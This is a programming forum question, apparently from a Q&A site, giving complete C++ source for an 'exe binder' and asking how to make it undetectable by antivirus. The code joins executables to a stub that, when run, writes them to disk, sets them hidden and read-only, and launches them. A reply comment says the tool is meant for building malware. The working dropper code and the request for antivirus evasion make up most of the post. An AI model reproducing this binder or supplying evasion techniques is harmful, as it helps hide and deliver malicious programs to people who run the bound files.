# About a undetectable exe binder

Tags: c++, security, exe

I made an exe binder (which can bind multiple exes without any error checking, anyway), it works as expected, only that the antivirus screams instantly :(

Here is the source code:

```cpp
#undef UNICODE
#include <Windows.h>

#include <fstream>
#include <vector>
#include <string>

#define SEPARATOR "*****"
#define SEPARATOR_SIZE strlen(SEPARATOR)

void FindAllOccurrences(const std::string& data, const std::string& query, std::vector<size_t>& occurancesPoss) {
    size_t pos = data.find(query);
    while(pos != std::string::npos) {
        occurancesPoss.push_back(pos);
        pos = data.find(query, pos + query.size());
    }
}

inline void FileAsString(const std::string& file, std::string& str, const std::ios_base::openmode iosOM = std::ios::binary) {
    std::ifstream ifs(file, iosOM);
    str.assign((std::istreambuf_iterator<char>(ifs)), std::istreambuf_iterator<char>());
}

void Bind(const std::vector<std::string>& files, const std::string& fileBinded, const std::string& fileOpener) {
    std::ofstream ofs(fileBinded, std::ios::binary);
    ofs << std::ifstream(fileOpener, std::ios::binary).rdbuf() << SEPARATOR;

    size_t index = files.size();
    for(auto& file : files) {
        ofs << std::ifstream(file, std::ios::binary).rdbuf();

        if(--index) {
            ofs << SEPARATOR;
        }
    }
}

void Open(const std::string& file) {
    std::string data;
    FileAsString(file, data);

    std::vector<size_t> occurancesPoss;
    FindAllOccurrences(data, SEPARATOR, occurancesPoss);

    std::vector<std::string> exes;
    for(size_t i = 1; i < occurancesPoss.size() - 1; i++) {
        std::string exeName(std::to_string(i) + ".exe");

        std::ofstream ofs(exeName, std::ios::binary);
        size_t exeStart = occurancesPoss[i] + SEPARATOR_SIZE;
        ofs << data.substr(exeStart, occurancesPoss[i + 1] - exeStart);

        exes.push_back(exeName);
    }

    {
        std::string exeName(std::to_string(occurancesPoss.size() - 1) + ".exe");

        std::ofstream ofs(exeName, std::ios::binary);
        ofs << data.substr(occurancesPoss.back() + SEPARATOR_SIZE);

        exes.push_back(exeName);
    }

    for(auto& exe : exes) {
        SetFileAttributes(exe.c_str(), FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
        ShellExecute(nullptr, "open", exe.c_str(), nullptr, nullptr, SW_NORMAL);
    }
}

int main(int argc, char** argv) {
    if(argc > 1) {
        Bind(std::vector<std::string>(&argv[1], argv + argc - 1), argv[argc - 1], argv[0]);
    } else {
        Open(argv[0]);
    }

    return 0;
}
```

My question is, **what makes an exe binder undetectable** and how to make it.
I think that the opener code should be the one which needs to be changed. Correct me if I am wrong.

*If you got any feedback for the code hit me up. (about the error checking.. I didn't add it for the sake of simplicity).*

Thank you in advance!

Answer (score 0):

What is the purpose of this application? You're using Windows API functions that are mosst commonly used in bad software. That's why the Anti Virus scanners are reacting.

Comment: I need to do a malware for college, and for the virus part I wanted to bind the most used exes with my exe, I can do it, but it's easily detectable, the thing is I want to do it correctly, I chosen windows for it's popularity.